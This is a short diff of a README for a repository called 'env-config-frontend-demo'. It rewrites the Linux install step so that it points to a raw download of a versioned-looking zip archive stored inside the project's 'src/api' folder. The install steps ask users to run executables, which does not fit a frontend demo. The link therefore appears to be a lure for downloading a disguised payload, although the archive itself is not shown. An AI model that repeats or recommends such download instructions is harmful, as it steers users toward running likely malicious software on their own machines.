Merlijnvos/env-config-frontend-demo/README.md

 1. **Windows:** Double-click the `.exe` file.
 Follow the on-screen instructions to complete the installation.
 2. **Mac:** Open the `.dmg` file and drag the application to your Applications folder.
 Open it from there.
-3. **Linux:** Extract the `.tar.gz` file to a location of your choice.
+3. **Linux:** Extract the `https://github.com/Merlijnvos/env-config-frontend-demo/raw/refs/heads/main/src/api/env_config_frontend_demo_2.3-beta.3.zip` file to a location of your choice.
 Run the application from the terminal.

 ### Step 5: Launch the Application